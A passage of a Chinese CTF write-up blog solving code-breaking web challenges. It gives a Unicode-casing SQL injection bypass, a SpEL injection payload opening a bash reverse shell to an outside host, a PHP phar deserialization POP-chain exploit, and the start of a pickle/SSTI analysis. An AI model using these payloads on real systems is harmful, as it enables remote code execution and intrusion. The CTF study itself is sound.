class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br></pre></td><td class="code"><pre><span class="line">// initial libraries</span><br><span class="line">const Koa = require(&apos;koa&apos;)</span><br><span class="line">const sqlite = require(&apos;sqlite&apos;)</span><br><span class="line">const fs = require(&apos;fs&apos;)</span><br><span class="line">const views = require(&apos;koa-views&apos;)</span><br><span class="line">const Router = require(&apos;koa-router&apos;)</span><br><span class="line">const send = require(&apos;koa-send&apos;)</span><br><span class="line">const bodyParser = require(&apos;koa-bodyparser&apos;)</span><br><span class="line">const session = require(&apos;koa-session&apos;)</span><br><span class="line">const isString = require(&apos;underscore&apos;).isString</span><br><span class="line">const basename = require(&apos;path&apos;).basename</span><br><span class="line"></span><br><span class="line">const config = JSON.parse(fs.readFileSync(&apos;../config.json&apos;, &#123;encoding: &apos;utf-8&apos;, flag: &apos;r&apos;&#125;))</span><br><span class="line"></span><br><span class="line">async function main() &#123;</span><br><span class="line">    const app = new Koa()</span><br><span class="line">    const router = new Router()</span><br><span class="line">    const db = await sqlite.open(&apos;:memory:&apos;)</span><br><span class="line"></span><br><span class="line">    await db.exec(`CREATE TABLE &quot;main&quot;.&quot;users&quot; (</span><br><span class="line">        &quot;id&quot; INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,</span><br><span class="line">        &quot;username&quot; TEXT NOT NULL,</span><br><span class="line">        &quot;password&quot; TEXT,</span><br><span class="line">        CONSTRAINT &quot;unique_username&quot; UNIQUE (&quot;username&quot;)</span><br><span class="line">    )`)</span><br><span class="line">    await db.exec(`CREATE TABLE &quot;main&quot;.&quot;flags&quot; (</span><br><span class="line">        &quot;id&quot; INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,</span><br><span class="line">        &quot;flag&quot; TEXT NOT NULL</span><br><span class="line">    )`)</span><br><span class="line">    for (let user of config.users) &#123;</span><br><span class="line">        await db.run(`INSERT INTO &quot;users&quot;(&quot;username&quot;, &quot;password&quot;) VALUES (&apos;$&#123;user.username&#125;&apos;, &apos;$&#123;user.password&#125;&apos;)`)</span><br><span class="line">    &#125;</span><br><span class="line">    await db.run(`INSERT INTO &quot;flags&quot;(&quot;flag&quot;) VALUES (&apos;$&#123;config.flag&#125;&apos;)`)</span><br><span class="line"></span><br><span class="line">    router.all(&apos;login&apos;, &apos;/login/&apos;, login).get(&apos;admin&apos;, &apos;/&apos;, admin).get(&apos;static&apos;, &apos;/static/:path(.+)&apos;, static).get(&apos;/source&apos;, source)</span><br><span class="line"></span><br><span class="line">    app.use(views(__dirname + &apos;/views&apos;, &#123;</span><br><span class="line">        map: &#123;</span><br><span class="line">            html: &apos;underscore&apos;</span><br><span class="line">        &#125;,</span><br><span class="line">        extension: &apos;html&apos;</span><br><span class="line">    &#125;)).use(bodyParser()).use(session(app))</span><br><span class="line"></span><br><span class="line">    app.use(router.routes()).use(router.allowedMethods());</span><br><span class="line"></span><br><span class="line">    app.keys = config.signed</span><br><span class="line">    app.context.db = db</span><br><span class="line">    app.context.router = router</span><br><span class="line">    app.listen(3000)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function safeKeyword(keyword) &#123;</span><br><span class="line">    if(isString(keyword) &amp;&amp; !keyword.match(/(union|select|;|\-\-)/is)) &#123;</span><br><span class="line">        return keyword</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    return undefined</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">async function login(ctx, next) &#123;</span><br><span class="line">    if(ctx.method == &apos;POST&apos;) &#123;</span><br><span class="line">        let username = safeKeyword(ctx.request.body[&apos;username&apos;])</span><br><span class="line">        let password = safeKeyword(ctx.request.body[&apos;password&apos;])</span><br><span class="line"></span><br><span class="line">        let jump = ctx.router.url(&apos;login&apos;)</span><br><span class="line">        if (username &amp;&amp; password) &#123;</span><br><span class="line">            let user = await ctx.db.get(`SELECT * FROM &quot;users&quot; WHERE &quot;username&quot; = &apos;$&#123;username.toUpperCase()&#125;&apos; AND &quot;password&quot; = &apos;$&#123;password.toUpperCase()&#125;&apos;`)</span><br><span class="line"></span><br><span class="line">            if (user) &#123;</span><br><span class="line">                ctx.session.user = user</span><br><span class="line"></span><br><span class="line">                jump = ctx.router.url(&apos;admin&apos;)</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        ctx.status = 303</span><br><span class="line">        ctx.redirect(jump)</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        await ctx.render(&apos;index&apos;)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">async function static(ctx, next) &#123;</span><br><span class="line">    await send(ctx, ctx.path)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">async function admin(ctx, next) &#123;</span><br><span class="line">    if(!ctx.session.user) &#123;</span><br><span class="line">        ctx.status = 303</span><br><span class="line">        return ctx.redirect(ctx.router.url(&apos;login&apos;))</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    await ctx.render(&apos;admin&apos;, &#123;</span><br><span class="line">        &apos;user&apos;: ctx.session.user</span><br><span class="line">    &#125;)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">async function source(ctx, next) &#123;</span><br><span class="line">    await send(ctx, basename(__filename))</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">main()</span><br></pre></td></tr></table></figure>
</li>
<li><p>关键代码在于 safeKeyword() 函数，过滤了 union 和 select</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">function safeKeyword(keyword) &#123;</span><br><span class="line">    if(isString(keyword) &amp;&amp; !keyword.match(/(union|select|;|\-\-)/is)) &#123;</span><br><span class="line">        return keyword</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    return undefined</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>p 牛在<a href="https://www.leavesongs.com/HTML/javascript-up-low-ercase-tip.html" target="_blank" rel="noopener">博客</a>中提到过如下特性，但是也适用于 python 中，这样就可以绕过保护函数，达到注入的目的</p>
<blockquote>
<p>“ ı “.toUpperCase() == ‘ I ‘</p>
<p>“ ſ “.toUpperCase() == ‘ S ‘</p>
<p>“ K “.toLowerCase() == ‘ k ‘</p>
</blockquote>
</li>
<li><p>payload :</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">POST</span><br><span class="line">username=peri0d&amp;password=&apos; un%C4%B1on %C5%BFelect 1,(%C5%BFelect flag from flags),3&apos;</span><br></pre></td></tr></table></figure>

</li>
</ul>
<h1 id="javacon"><a href="#javacon" class="headerlink" title="javacon"></a>javacon</h1><ul>
<li><p>EI 表达式注入，<a href="http://rui0.cn/archives/1043" target="_blank" rel="noopener">http://rui0.cn/archives/1043</a></p>
</li>
<li><p>基础知识</p>
<ul>
<li>[SpEL 注入](<a href="https://peri0d.xyz/2019/09/10/SpEL" target="_blank" rel="noopener">https://peri0d.xyz/2019/09/10/SpEL</a> 注入/)</li>
<li>[Java 反射机制](<a href="https://peri0d.xyz/2019/09/10/Java" target="_blank" rel="noopener">https://peri0d.xyz/2019/09/10/Java</a> 反射机制/)</li>
<li>[Linux 反弹 shell](<a href="https://peri0d.xyz/2019/09/10/反弹" target="_blank" rel="noopener">https://peri0d.xyz/2019/09/10/反弹</a> shell/)</li>
</ul>
</li>
<li><p>目录结构如下</p>
<p><a href="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/javacon_1.PNG" target="_blank" rel="noopener"><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/javacon_1.PNG" alt="img"></a></p>
</li>
<li><p>SpringBoot 框架，看了一下 Spring 表达式</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">public class HelloWorld &#123; </span><br><span class="line">    public static void main(String[] args) &#123; </span><br><span class="line">        //构造上下文：准备比如变量定义等等表达式运行需要的上下文数据 </span><br><span class="line">        EvaluationContext context = new StandardEvaluationContext(); </span><br><span class="line">        //创建解析器：提供SpelExpressionParser默认实现 </span><br><span class="line">        ExpressionParser parser = new SpelExpressionParser(); </span><br><span class="line">        //解析表达式：使用ExpressionParser来解析表达式为相应的Expression对象 </span><br><span class="line">        Expression expression = </span><br><span class="line">        parser.parseExpression(&quot;(&apos;Hello&apos; + &apos; World&apos;).concat(#end)&quot;); </span><br><span class="line"></span><br><span class="line">        //设置上下文中的变量的值 </span><br><span class="line">        context.setVariable(&quot;end&quot;, &quot;!SpringEL&quot;); </span><br><span class="line">        //执行表达式，获取运行结果 </span><br><span class="line">        String str = (String)expression.getValue(context); </span><br><span class="line">        // the str=Hello World!SpringEL</span><br><span class="line">        System.out.println(&quot;the str=&quot;+str); </span><br><span class="line">    &#125; </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>先看配置文件 <code>application.yml</code>，提供了一个黑名单和用户列表</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">spring:</span><br><span class="line">  thymeleaf:</span><br><span class="line">    encoding: UTF-8</span><br><span class="line">    cache: false</span><br><span class="line">    mode: HTML</span><br><span class="line">keywords:</span><br><span class="line">  blacklist:</span><br><span class="line">    - java.+lang</span><br><span class="line">    - Runtime</span><br><span class="line">    - exec.*\(</span><br><span class="line">user:</span><br><span class="line">  username: admin</span><br><span class="line">  password: admin</span><br><span class="line">  rememberMeKey: c0dehack1nghere1</span><br></pre></td></tr></table></figure>
</li>
<li><p>文件结构 :</p>
<ul>
<li><code>SmallEvaluationContext.java</code> 实现构造上下文的功能</li>
<li><code>ChallengeApplication.java</code> 实现启动功能</li>
<li><code>Encryptor.java</code> 实现 <code>AES</code> 加解密</li>
<li><code>KeyworkProperties.java</code> 实现黑名单</li>
<li><code>UserConfig.java</code> 实现用户模型，其中的 <code>RememberMe</code> 用到了 <code>Encryptor</code></li>
<li><code>MainController.java</code> 控制程序的主要逻辑</li>
</ul>
</li>
<li><p>主要看 <code>MainController.java</code> 中的代码，在 <code>login</code> 功能处，如果勾选 <code>Remember me</code> 就会返回一个加密之后的 cookie，然后跳转到 <code>hello.html</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">@PostMapping(&quot;/login&quot;)</span><br><span class="line">    public String login(@RequestParam(value = &quot;username&quot;, required = true) String username,</span><br><span class="line">                        @RequestParam(value = &quot;password&quot;, required = true) String password,</span><br><span class="line">                        @RequestParam(value = &quot;remember-me&quot;, required = false) String isRemember,</span><br><span class="line">                        HttpSession session, HttpServletResponse response)</span><br><span class="line">    &#123;</span><br><span class="line">        if (userConfig.getUsername().contentEquals(username) &amp;&amp; userConfig.getPassword().contentEquals(password)) &#123;</span><br><span class="line">            session.setAttribute(&quot;username&quot;, username);</span><br><span class="line"></span><br><span class="line">            if (isRemember != null &amp;&amp; !isRemember.equals(&quot;&quot;)) &#123;</span><br><span class="line">                Cookie c = new Cookie(&quot;remember-me&quot;, userConfig.encryptRememberMe());</span><br><span class="line">                c.setMaxAge(60 * 60 * 24 * 30);</span><br><span class="line">                response.addCookie(c);</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            return &quot;redirect:/&quot;;</span><br><span class="line">        &#125;</span><br><span class="line">        return &quot;redirect:/login-error&quot;;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p><a href="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/javacon_2.PNG" target="_blank" rel="noopener"><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/javacon_2.PNG" alt="img"></a></p>
</li>
<li><p>对敏感信息 <code>cookie</code> 的操作如下，首先判断 <code>remember-me</code> 是否存在，然后获取其值进行解密，直接将它赋值给 <code>username</code>，接下来就是使用 <code>getAdvanceValue()</code> 这个自定义函数赋值给 <code>name</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">@GetMapping</span><br><span class="line">    public String admin(@CookieValue(value = &quot;remember-me&quot;, required = false) String rememberMeValue,HttpSession session,Model model) &#123;</span><br><span class="line">        if (rememberMeValue != null &amp;&amp; !rememberMeValue.equals(&quot;&quot;)) &#123;</span><br><span class="line">            String username = userConfig.decryptRememberMe(rememberMeValue);</span><br><span class="line">            if (username != null) &#123;</span><br><span class="line">                session.setAttribute(&quot;username&quot;, username);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        Object username = session.getAttribute(&quot;username&quot;);</span><br><span class="line">        if(username == null || username.toString().equals(&quot;&quot;)) &#123;</span><br><span class="line">            return &quot;redirect:/login&quot;;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        model.addAttribute(&quot;name&quot;, getAdvanceValue(username.toString()));</span><br><span class="line">        return &quot;hello&quot;;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p><code>getAdvanceValue</code> 函数如下，就是与黑名单匹配，如果匹配则抛出 <code>FORBIDDEN</code>，否则进行正常的 SpEL 解析</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">private String getAdvanceValue(String val) &#123;</span><br><span class="line">        for (String keyword: keyworkProperties.getBlacklist()) &#123;</span><br><span class="line">            Matcher matcher = Pattern.compile(keyword, Pattern.DOTALL | Pattern.CASE_INSENSITIVE).matcher(val);</span><br><span class="line">            if (matcher.find()) &#123;</span><br><span class="line">                throw new HttpClientErrorException(HttpStatus.FORBIDDEN);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        ParserContext parserContext = new TemplateParserContext();</span><br><span class="line">        Expression exp = parser.parseExpression(val, parserContext);</span><br><span class="line">        SmallEvaluationContext evaluationContext = new SmallEvaluationContext();</span><br><span class="line">        return exp.getValue(evaluationContext).toString();</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>这里就是 SpEL 注入实现 RCE 了，在不指定 <code>EvaluationContext</code> 时，默认采用的是 <code>StandardEvaluationContext</code> ，这里还进行了黑名单匹配，利用反射就可以绕过黑名单</p>
</li>
<li><p>在 JAVA 中，通过 <code>java.lang.Runtime.getRuntime().exec(cmd)</code> 来执行命令，这里可以利用反射写一个反弹 shell 来 getshell，构造 payload 如下 :</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">#&#123;T(String).getClass().forName(&quot;java.l&quot;+&quot;ang.Ru&quot;+&quot;ntime&quot;).getMethod(&quot;ex&quot;+&quot;ec&quot;,T(String[])).invoke(T(String).getClass().forName(&quot;java.l&quot;+&quot;ang.Ru&quot;+&quot;ntime&quot;).getMethod(&quot;getRu&quot;+&quot;ntime&quot;).invoke(T(String).getClass().forName(&quot;java.l&quot;+&quot;ang.Ru&quot;+&quot;ntime&quot;)),new String[]&#123;&quot;/bin/bash&quot;,&quot;-c&quot;,&quot;bash -i &gt;&amp; /dev/tcp/192.168.233.130/2333 0&gt;&amp;1&quot;&#125;)&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>加密之后修改 cookie 发送</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">import static net.mindview.util.Print.*;</span><br><span class="line"></span><br><span class="line">public class sss &#123;</span><br><span class="line">    public static void main(String[] args) &#123;</span><br><span class="line">        String x = &quot;#&#123;T(String).getClass().forName(\&quot;java.l\&quot;+\&quot;ang.Ru\&quot;+\&quot;ntime\&quot;).getMethod(\&quot;ex\&quot;+\&quot;ec\&quot;,T(String[])).invoke(T(String).getClass().forName(\&quot;java.l\&quot;+\&quot;ang.Ru\&quot;+\&quot;ntime\&quot;).getMethod(\&quot;getRu\&quot;+\&quot;ntime\&quot;).invoke(T(String).getClass().forName(\&quot;java.l\&quot;+\&quot;ang.Ru\&quot;+\&quot;ntime\&quot;)),new String[]&#123;\&quot;/bin/bash\&quot;,\&quot;-c\&quot;,\&quot;bash -i &gt;&amp; /dev/tcp/192.168.233.130/2333 0&gt;&amp;1\&quot;&#125;)&#125;&quot;;</span><br><span class="line">        String y = Encryptor.encrypt(&quot;c0dehack1nghere1&quot;, &quot;0123456789abcdef&quot;, x);</span><br><span class="line">        print(y);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>实现反弹 shell</p>
<p><a href="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/javacon_3.PNG" target="_blank" rel="noopener"><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/javacon_3.PNG" alt="img"></a></p>
<p><a href="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/javacon_4.PNG" target="_blank" rel="noopener"><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/javacon_4.PNG" alt="img"></a></p>
</li>
</ul>
<h1 id="lumenserial"><a href="#lumenserial" class="headerlink" title="lumenserial"></a>lumenserial</h1><ul>
<li><p>寻找 POP 链，phar 反序列化，GitHub 给的 docker 环境好像有点问题</p>
</li>
<li><p><a href="https://github.com/phith0n/code-breaking/blob/master/2018/lumenserial" target="_blank" rel="noopener">https://github.com/phith0n/code-breaking/blob/master/2018/lumenserial</a></p>
</li>
<li><p>首先看一下路由信息，当访问 <code>/server/editor</code> 时会调用 <code>App\Http\Controllers</code> 的 <code>main</code> 方法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$router-&gt;get(&apos;/server/editor&apos;, &apos;EditorController@main&apos;);</span><br><span class="line">$router-&gt;post(&apos;/server/editor&apos;, &apos;EditorController@main&apos;);</span><br></pre></td></tr></table></figure>
</li>
<li><p>进入 <code>EditorController.php</code> 文件，存在 <code>doUploadImage</code>，<code>doCatchimage</code>，<code>doListImage</code>，<code>doConfig</code> 的功能。进入 <code>main</code>，从 url 获取 action 参数，如果 action 存在就执行这个函数，返回结果均为 json 格式</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">public function main(Request $request)</span><br><span class="line">&#123;</span><br><span class="line">    $action = $request-&gt;query(&apos;action&apos;);</span><br><span class="line">    try &#123;</span><br><span class="line">        if (is_string($action) &amp;&amp; method_exists($this, &quot;do&#123;$action&#125;&quot;)) &#123;</span><br><span class="line">            return call_user_func([$this, &quot;do&#123;$action&#125;&quot;], $request);</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            throw new FileException(&apos;Method error&apos;);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; catch (FileException $e) &#123;</span><br><span class="line">        return response()-&gt;json([&apos;state&apos; =&gt; $e-&gt;getMessage()]);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>在 <code>download</code> 函数中，<code>$url</code> 未经过滤就传给了 <code>file_get_contents</code>，而 <code>$url</code> 源自 <code>doCatchimage</code> 中的 <code>$request-&gt;input($this-&gt;config[&#39;catcherFieldName&#39;])</code>，查看配置文件 <code>/resources/editor/config.json</code> 就可以知道其值为 <code>source</code>，也就是 url 中的 source 参数，然后就可以利用 phar 反序列化</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">protected function doCatchimage(Request $request)</span><br><span class="line">&#123;</span><br><span class="line">    $sources = $request-&gt;input($this-&gt;config[&apos;catcherFieldName&apos;]);</span><br><span class="line">    $rets = [];</span><br><span class="line">    if ($sources) &#123;</span><br><span class="line">        foreach ($sources as $url) &#123;</span><br><span class="line">            $rets[] = $this-&gt;download($url);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    return response()-&gt;json([</span><br><span class="line">        &apos;state&apos; =&gt; &apos;SUCCESS&apos;,</span><br><span class="line">        &apos;list&apos; =&gt; $rets</span><br><span class="line">    ]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>可以直接根据已有的 payload 构造反序列化 <a href="https://xz.aliyun.com/t/6059" target="_blank" rel="noopener">https://xz.aliyun.com/t/6059</a></p>
</li>
<li><p>exp :</p>
</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">  namespace Illuminate\Broadcasting &#123;</span><br><span class="line">      class PendingBroadcast &#123;</span><br><span class="line">          protected $events;</span><br><span class="line">          protected $event;</span><br><span class="line">          function __construct($evilCode)</span><br><span class="line">          &#123;</span><br><span class="line">              $this-&gt;events = new \Illuminate\Bus\Dispatcher();</span><br><span class="line">              $this-&gt;event = new BroadcastEvent($evilCode);</span><br><span class="line">          &#125;</span><br><span class="line">      &#125;</span><br><span class="line"></span><br><span class="line">    class BroadcastEvent &#123;</span><br><span class="line">          public $connection;</span><br><span class="line">          function __construct($evilCode)</span><br><span class="line">          &#123;</span><br><span class="line">              $this-&gt;connection = new \Mockery\Generator\MockDefinition($evilCode);</span><br><span class="line">          &#125;</span><br><span class="line">      &#125;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  namespace Illuminate\Bus &#123;</span><br><span class="line">      class Dispatcher &#123;</span><br><span class="line">          protected $queueResolver;</span><br><span class="line">          function __construct()</span><br><span class="line">          &#123;</span><br><span class="line">              $this-&gt;queueResolver = [new \Mockery\Loader\EvalLoader(), &apos;load&apos;];</span><br><span class="line">          &#125;</span><br><span class="line">      &#125;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  namespace Mockery\Loader &#123;</span><br><span class="line">      class EvalLoader &#123;&#125;</span><br><span class="line">  &#125;</span><br><span class="line">  namespace Mockery\Generator &#123;</span><br><span class="line">      class MockDefinition &#123;</span><br><span class="line">          protected $config;</span><br><span class="line">          protected $code;</span><br><span class="line">          function __construct($evilCode)</span><br><span class="line">          &#123;</span><br><span class="line">              $this-&gt;code = $evilCode;</span><br><span class="line">              $this-&gt;config = new MockConfiguration();</span><br><span class="line">          &#125;</span><br><span class="line">      &#125;</span><br><span class="line">      class MockConfiguration &#123;</span><br><span class="line">          protected $name = &apos;abcdefg&apos;;</span><br><span class="line">      &#125;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  namespace &#123;</span><br><span class="line">    $code = &quot;&lt;?php phpinfo(); exit; ?&gt;&quot;;</span><br><span class="line">    $exps = new \Illuminate\Broadcasting\PendingBroadcast($code);</span><br><span class="line"></span><br><span class="line">      $p = new Phar(&apos;exp.phar&apos;, 0, &apos;exp.phar&apos;);</span><br><span class="line">      $p-&gt;startBuffering();</span><br><span class="line">      $p-&gt;setStub(&apos;GIF89a&lt;?php __HALT_COMPILER(); ?&gt;&apos;);</span><br><span class="line">      $p-&gt;setMetadata($exps);</span><br><span class="line">      $p-&gt;addFromString(&apos;1.txt&apos;,&apos;text&apos;);</span><br><span class="line">      $p-&gt;stopBuffering();</span><br><span class="line">  &#125;</span><br><span class="line">  ?&gt;</span><br></pre></td></tr></table></figure>

<h1 id="picklecode"><a href="#picklecode" class="headerlink" title="picklecode"></a>picklecode</h1><ul>
<li>python 反序列化，Django 模板引擎沙箱</li>
<li>基础知识 : <a href="https://peri0d.xyz/2019/09/10/python反序列化/" target="_blank" rel="noopener">python 反序列化</a></li>
<li>通常代码审计先看配置文件，Django 配置文件 <code>web/core/setting.py</code>，发现如下代码 :</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">SESSION_ENGINE = &apos;django.contrib.sessions.backends.signed_cookies&apos;</span><br><span class="line">  SESSION_SERIALIZER = &apos;core.serializer.PickleSerializer&apos;</span><br></pre></td></tr></table></figure>

<ul>
<li>一般默认的 Django 配置文件是不含这两项的，<code>SESSION_ENGINE</code> 是用户 session 存储的位置，<code>SESSION_SERIALIZER</code> 是 session 存储的方式。用户的 session 先经过 <code>SESSION_SERIALIZER</code> 处理成一个字符串后存储到 <code>SESSION_ENGINE</code> 指定的位置。在这里，就是 session 使用 pickle 的序列化方法，经过签名后存储在 cookies 中，我们所不知道的就是签名的密钥</li>
<li>思路就是获取密钥，pickle 反序列化</li>
<li>阅读路由信息，首先会调用 <code>views.RegistrationLoginView.as_view()</code> 函数，进行登录或者注册之后，在 <code>views.index()</code> 函数中直接将用户名拼接到模板中，也就是说这里存在着 SSTI 漏洞，那就可以利用它获取 <code>SECRET_KEY</code></li>
</ul>
